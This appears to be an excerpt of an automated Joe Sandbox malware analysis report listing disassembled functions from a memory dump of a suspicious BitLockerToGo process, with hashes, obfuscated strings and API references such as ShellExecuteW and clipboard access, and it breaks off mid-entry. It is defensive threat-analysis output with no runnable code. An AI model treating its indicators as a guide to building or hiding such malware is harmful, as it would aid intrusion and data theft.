                                                                                                                                                                                        • API String ID: 0-379507330
                                                                                                                                                                                        • Opcode ID: 9aac3dadfd92beace08653a77e3d2e53dd5bad71ee1b60558ca3289dd522376f
                                                                                                                                                                                        • Instruction ID: 6f94e1301420d6b94b49ea6ce58ca0dbf29cafda9aeb6ccb97b60b128decab9a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9aac3dadfd92beace08653a77e3d2e53dd5bad71ee1b60558ca3289dd522376f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 765226B5908341CBD724CF25D8917ABB7E1FFD6314F088A2EE4998B391E7389845CB46
                                                                                                                                                                                        Function 0040D0D0 Relevance: 14.0, Strings: 11, Instructions: 224COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: -,`f$<$<0bb$=`zo$MQOH$SQMP$TPFR$bcw"$cngj$h0Zv$r
                                                                                                                                                                                        • API String ID: 0-534936077
                                                                                                                                                                                        • Opcode ID: e44040a4b2735c65299fc088213c7fada4f07abc1c84e62ae890a2810560b444
                                                                                                                                                                                        • Instruction ID: ce9cc857ad2a35744a619bcc3e69b087bbb2b544f77d88644a95bf7d88b07341
                                                                                                                                                                                        • Opcode Fuzzy Hash: e44040a4b2735c65299fc088213c7fada4f07abc1c84e62ae890a2810560b444
                                                                                                                                                                                        • Instruction Fuzzy Hash: D651A4B050C3808FD3158F6985A176BFFE09FA7305F1849ADE4D14B391D379890E8B6A
                                                                                                                                                                                        Function 004224C0 Relevance: 13.3, Strings: 10, Instructions: 770COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $6B$%:B$71B$@2B$E9B$J4B$_4B$q3B$q3B$3B
                                                                                                                                                                                        • API String ID: 0-1888653130
                                                                                                                                                                                        • Opcode ID: 22fcd4ca15b18e3d348338aeadeff69f89c07832c703c027b0d26b109637b95b
                                                                                                                                                                                        • Instruction ID: 7f0f01cb03e0375dbc82f1a4d542776da3309397d50275b0bf7978d5e863f5e7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 22fcd4ca15b18e3d348338aeadeff69f89c07832c703c027b0d26b109637b95b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A826CB0508B819EE3318F3C8845787BFE5AB5A324F184A5ED0EE877D2C7796405CB66
                                                                                                                                                                                        Function 0041F0A0 Relevance: 12.7, Strings: 9, Instructions: 1420COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: )*+$$-670$4$9:;;$ADD!$MNOH$hi$p$yz{t
                                                                                                                                                                                        • API String ID: 0-965787625
                                                                                                                                                                                        • Opcode ID: b3b8e8acc25af02a59f8ec1021682e3b75562046ec294ac47f9e3bb3cd44da48
                                                                                                                                                                                        • Instruction ID: cc7affe68f23fc9ea8910a37647526637894669464dc6ad84708522b1b2e58f7
                                                                                                                                                                                        • Opcode Fuzzy Hash: b3b8e8acc25af02a59f8ec1021682e3b75562046ec294ac47f9e3bb3cd44da48
                                                                                                                                                                                        • Instruction Fuzzy Hash: E1A215715083918BD324CF25C4907EBBBE1EFD6314F18892EE4C99B392D778894ACB56
                                                                                                                                                                                        Function 00401000 Relevance: 11.9, Strings: 8, Instructions: 1877COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
                                                                                                                                                                                        • API String ID: 0-2771814109
                                                                                                                                                                                        • Opcode ID: 353dfabdde4a7e9726d16ac0254c63630fb587a20261aa011991098e3251c6d9
                                                                                                                                                                                        • Instruction ID: 9e4664713ad25b3cb4018547a2fcd9b7f78a99cc019696b9770dc03a1de712fc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 353dfabdde4a7e9726d16ac0254c63630fb587a20261aa011991098e3251c6d9
                                                                                                                                                                                        • Instruction Fuzzy Hash: C8D2F5716083418FC718CE29C59066BBBE2AFC9314F188A3EE895A73D1D779DD05CB86
                                                                                                                                                                                        Function 004270A0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 379COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DrivesLogical
                                                                                                                                                                                        • String ID: 2vB$>u{$SQ$W@$]wB
                                                                                                                                                                                        • API String ID: 999431828-1484276304
                                                                                                                                                                                        • Opcode ID: c99e03e63bb59b9db395fd0fa9c35ea9ec86fba2d9b7a966b2c4d6aede12bb2c
                                                                                                                                                                                        • Instruction ID: 5017136d9af59afada69a8d8b8d3279e8dce1753646a9e56419c6b978a1eb149
                                                                                                                                                                                        • Opcode Fuzzy Hash: c99e03e63bb59b9db395fd0fa9c35ea9ec86fba2d9b7a966b2c4d6aede12bb2c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CD1C9B460C3508FD314DF15E89162BBBE1EF92354F448A1DF4D69B391E7B88905CB8A
                                                                                                                                                                                        Function 0040E086 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,4FDE49DB,0044758A,?,00000000,00000005), ref: 0040E166
                                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,4FDE49DB,0044758A,?,00000000,00000005), ref: 0040E246
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ExecuteShell
                                                                                                                                                                                        • String ID: Jwi$ Jwi$03$@A
                                                                                                                                                                                        • API String ID: 587946157-631218979
                                                                                                                                                                                        • Opcode ID: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
                                                                                                                                                                                        • Instruction ID: 719729e5bd3b7bf6a0f222fbc426195e9f6861b77d8ea8eba2b75b34d4db9ccc
                                                                                                                                                                                        • Opcode Fuzzy Hash: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2041E77029C3408BD3248F65985578BBFF1ABD6724F044E2DE5D5AB3C1D7B884068F9A
                                                                                                                                                                                        Function 0040EBD0 Relevance: 10.4, Strings: 8, Instructions: 445COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 'O+M$+sq$7dVCApaVSuJAHxS2hly8AvsgLmmtzBWUGr_DufxF.Bw-1728776664-0.0.1.1-/api$8$<?$APWE$APWE${+y
                                                                                                                                                                                        • API String ID: 0-390074210
                                                                                                                                                                                        • Opcode ID: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
                                                                                                                                                                                        • Instruction ID: a5e9ad99a6abc216e060f8e326d44814c3342a23099fdf066d996cb67c7fb471
                                                                                                                                                                                        • Opcode Fuzzy Hash: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FD1277560D3908BD320CF25849036BBBE2ABD2704F19C93DE8D55B782D7798D0A8B86
                                                                                                                                                                                        Function 0040D330 Relevance: 10.3, Strings: 8, Instructions: 283COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: /3M7$?tr$K0Ib$KtLI$XLBz$Z(*V$fim`$q_
                                                                                                                                                                                        • API String ID: 0-150372196
                                                                                                                                                                                        • Opcode ID: aae30c2cf5a17a276152600da2665cf81e2c8644b5c952e3f0a03da3bae6202a
                                                                                                                                                                                        • Instruction ID: 5198aafa245361afd4c434ba771b23a1f4d556de58515439c00a5c82cc35a444
                                                                                                                                                                                        • Opcode Fuzzy Hash: aae30c2cf5a17a276152600da2665cf81e2c8644b5c952e3f0a03da3bae6202a
                                                                                                                                                                                        • Instruction Fuzzy Hash: D291AE7190C3908BD321CF29D45075BFFE1AF96314F0889ADE4D59B382D379880ACB96
                                                                                                                                                                                        Function 00435320 Relevance: 9.1, APIs: 6, Instructions: 120clipboardCOMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1647500905-0
                                                                                                                                                                                        • Opcode ID: 90010e87969aa8808ec1d001f818ae175d346234814b74b2b0a97fff026261c4
                                                                                                                                                                                        • Instruction ID: e3ac008403cae3d161f0565e61e2e38b87bbf720fddabf510a696b7fe91a294e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 90010e87969aa8808ec1d001f818ae175d346234814b74b2b0a97fff026261c4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 054123B190CB80CFE714AB78C44836BBFE09B26315F14897EC4E647682D2BD9589C767
                                                                                                                                                                                        Function 0040135D Relevance: 7.2, Strings: 5, Instructions: 980COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 0$0$0$@$i
                                                                                                                                                                                        • API String ID: 0-3124195287
                                                                                                                                                                                        • Opcode ID: ceedd92307ca5154f54f74983b84874e4e886e2e5e962be19e72f683998aca9b
                                                                                                                                                                                        • Instruction ID: b862f034f221e98106bc73402b63235ea6f990c049fe399508b27bff9f45a0b2
                                                                                                                                                                                        • Opcode Fuzzy Hash: ceedd92307ca5154f54f74983b84874e4e886e2e5e962be19e72f683998aca9b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2572E271A083428FC718CE28C59475BBBE1ABD9314F148A3EE8D5A73D1D778DD098B86
                                                                                                                                                                                        Function 004203A0 Relevance: 7.0, Strings: 5, Instructions: 793COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: AJ$AJ$\]$`M$}t
                                                                                                                                                                                        • API String ID: 0-3506948131
                                                                                                                                                                                        • Opcode ID: dbe2fb993bac3670a11d0505a43ec6f7d5d3b1be7c7e68665c50607e30d1052a
                                                                                                                                                                                        • Instruction ID: b3dbc1111c1f5d25125a0287e7126fc93de9cce64f94811cf34d3af63b6d7073
                                                                                                                                                                                        • Opcode Fuzzy Hash: dbe2fb993bac3670a11d0505a43ec6f7d5d3b1be7c7e68665c50607e30d1052a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F3245B6E00214DFDB14CFA8D8912EEBBB1FF96310F48856DD445AB382E3789905CB95
                                                                                                                                                                                        Function 00401655 Relevance: 6.7, Strings: 5, Instructions: 470COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                                                        • API String ID: 0-1123320326
                                                                                                                                                                                        • Opcode ID: 63f3683fc18aa3d941e6f13d996163d9ffe9dda6134d9755ed4bf671525ece9a
                                                                                                                                                                                        • Instruction ID: 21cadf65c7769e63cb9efb29d9c788b6e62b7b8b90c1ec4be3ed8809db57933e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 63f3683fc18aa3d941e6f13d996163d9ffe9dda6134d9755ed4bf671525ece9a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D02927060C3428FC314CE29C49065BFBE2AFD9304F588A3EE8D5A7395D779D9498B86
                                                                                                                                                                                        Function 004013A7 Relevance: 6.6, Strings: 5, Instructions: 387COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                                                        • API String ID: 0-3620105454
                                                                                                                                                                                        • Opcode ID: 72fb9ea5f64498536222b29e57accaaa6a6f11b0222b67828a656afa6e2a9c24
                                                                                                                                                                                        • Instruction ID: 8afc4e0bff92491430bd375e5e5080bbdc536b94bd936647b9b2b686ad4a9b61
                                                                                                                                                                                        • Opcode Fuzzy Hash: 72fb9ea5f64498536222b29e57accaaa6a6f11b0222b67828a656afa6e2a9c24
                                                                                                                                                                                        • Instruction Fuzzy Hash: 57E1A27160C7418FC315CF29C49065BFBE2AFD9304F48CA6EE8D997396D638D9098B86
                                                                                                                                                                                        Function 00442CB0 Relevance: 5.4, Strings: 4, Instructions: 432COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 21D$R1D$b0D$r0D
                                                                                                                                                                                        • API String ID: 0-3648752990
                                                                                                                                                                                        • Opcode ID: 463d857d479c3482d447ce3fc1c766c870d74460af236e89bd9ba5634c10f883
                                                                                                                                                                                        • Instruction ID: c0f82995aa7960e06d1df4520e4e6aa4651bc3d4a9cb12e857aa64bec413ddee
                                                                                                                                                                                        • Opcode Fuzzy Hash: 463d857d479c3482d447ce3fc1c766c870d74460af236e89bd9ba5634c10f883
                                                                                                                                                                                        • Instruction Fuzzy Hash: 66C1683AA08221CFD708CF29D8903AFB7E1FB8A311F1A857DD88597352D235AD45CB95
                                                                                                                                                                                        Function 00441B40 Relevance: 5.4, Strings: 4, Instructions: 352COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: pz$t$xr$|<
                                                                                                                                                                                        • API String ID: 0-1407822990
                                                                                                                                                                                        • Opcode ID: dab523c5527bbcba87711cc370e44c21a48cf25ccb3e5627869e35718faf0ac0
                                                                                                                                                                                        • Instruction ID: a4a2774bdabe991c702690097473077e9a65327825429c4baad52d5dd8b5c0b9
                                                                                                                                                                                        • Opcode Fuzzy Hash: dab523c5527bbcba87711cc370e44c21a48cf25ccb3e5627869e35718faf0ac0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 73A17776A083505BF7149E299C8176BBBD5DBC1354F080A3EED95833A2F638EC44879A
                                                                                                                                                                                        Function 00429000 Relevance: 5.2, Strings: 4, Instructions: 220COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 7eg$GB$~IdW$]_
                                                                                                                                                                                        • API String ID: 0-888033534
                                                                                                                                                                                        • Opcode ID: 0cee7e7564a1d8b422563681f8ed96f39d033652c33ca22b69c21d83138b3fa0
                                                                                                                                                                                        • Instruction ID: 84aa9cd9690129d1a2ec58f0b6eafcc0601a1e6da3e7e0d0d445c90d31a37ab0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cee7e7564a1d8b422563681f8ed96f39d033652c33ca22b69c21d83138b3fa0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0861F3B1A083518BD710DF25E88176BBBF0EF95754F18891DF8C85B391E3398904CB9A
                                                                                                                                                                                        Function 0042B984 Relevance: 5.2, Strings: 4, Instructions: 214COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 'O"A$>o)a$o7cI$w3k5
                                                                                                                                                                                        • API String ID: 0-858738269
                                                                                                                                                                                        • Opcode ID: 990e76721c41531cb212e58cb897d10c8029687d089ae4400274371d2efed3b6
                                                                                                                                                                                        • Instruction ID: 307fbae7767a3830c212164d5aa16c9eab5e3ea8c252295005c1c84c1fe57e1d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 990e76721c41531cb212e58cb897d10c8029687d089ae4400274371d2efed3b6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C91CBF49007469FC314DF6AC8815AAFFB2FB85300B558698D0946FB0AC734A996CFD6
                                                                                                                                                                                        Function 00421490 Relevance: 4.3, Strings: 3, Instructions: 585COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID: `/${$~d
                                                                                                                                                                                        • API String ID: 2994545307-1854514315
                                                                                                                                                                                        • Opcode ID: 16c375240bf59ef2a5d9f0026150afe1e4b911b9e870b47d89d4d33204325aac
                                                                                                                                                                                        • Instruction ID: a85ff511363dafe8cbf5aa9d065e57ef598be5a1b680af0702579bd5196d7df6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 16c375240bf59ef2a5d9f0026150afe1e4b911b9e870b47d89d4d33204325aac
                                                                                                                                                                                        • Instruction Fuzzy Hash: C512E2746083519BE734DF11D841BAFB7E2FBD8304F54892EE5899B3A0E735A801CB5A
                                                                                                                                                                                        Function 004424B0 Relevance: 4.3, Strings: 3, Instructions: 535COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2,D$<ONQ$B)D
                                                                                                                                                                                        • API String ID: 0-2125771505
                                                                                                                                                                                        • Opcode ID: 0582acfd73ad633ff0a0fad5c02837de8311d6131ed3edceeeb4608828acc853
                                                                                                                                                                                        • Instruction ID: 4ecf1f535e18c04082f97ee35b20ce2aff23ce9ea774c8069ea456f0e753fa22
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0582acfd73ad633ff0a0fad5c02837de8311d6131ed3edceeeb4608828acc853
                                                                                                                                                                                        • Instruction Fuzzy Hash: A5F1643AB18211CFD708CF29E8A166AB7E2FBCA314F0985BDD98583791D7749805CB85
                                                                                                                                                                                        Function 00421D60 Relevance: 4.2, Strings: 3, Instructions: 468COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 9qv0$l$x
                                                                                                                                                                                        • API String ID: 0-139331711
                                                                                                                                                                                        • Opcode ID: 1cd06f43832675a341bfe70f618d1da5ead52033382c9d416e3e93da06dcc2ef
                                                                                                                                                                                        • Instruction ID: 4f7627b54a0ccc77afcf5fe30c30a60131b97ad2187d5c3ba072864fc3bb3441
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cd06f43832675a341bfe70f618d1da5ead52033382c9d416e3e93da06dcc2ef
                                                                                                                                                                                        • Instruction Fuzzy Hash: 50E13572608350ABD7109F21EC42BAFBBE5EBD5314F04493EF88497392E279AD058797
                                                                                                                                                                                        Function 004292C0 Relevance: 4.2, Strings: 3, Instructions: 421COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: WS$Z[$iW
                                                                                                                                                                                        • API String ID: 0-4169752337
                                                                                                                                                                                        • Opcode ID: 8a787866a4cb88e2af13300d1c1076d96f45e056a63c4d75919fb56c066dba56
                                                                                                                                                                                        • Instruction ID: dd0fdf72f26ae62dcca7f76d287b9fa60ddfb019d7445d45454cb645f50c4bed
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a787866a4cb88e2af13300d1c1076d96f45e056a63c4d75919fb56c066dba56
                                                                                                                                                                                        • Instruction Fuzzy Hash: 22D100B8608344DFE320DF65E881A6BBBE1FB86304F54482DF1C997261D7399905CB5A
                                                                                                                                                                                        Function 004081B0 Relevance: 4.2, Strings: 3, Instructions: 420COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: )$)$IEND
                                                                                                                                                                                        • API String ID: 0-588110143
                                                                                                                                                                                        • Opcode ID: 0caf7f9e2faa8629aef0779799c76792d45e80eda53bbc0218ed18fa644585bf
                                                                                                                                                                                        • Instruction ID: 195f0635e0d2105a0192f7fd8c5038f15dbd734ae3d9341a0ddd48bfc11863ee
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0caf7f9e2faa8629aef0779799c76792d45e80eda53bbc0218ed18fa644585bf
                                                                                                                                                                                        • Instruction Fuzzy Hash: B4F1F371A04B11ABD314DF24C88171BBBE0BB95314F144A3EF995A73C2DB78E914CB8A
                                                                                                                                                                                        Function 0042D060 Relevance: 3.9, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
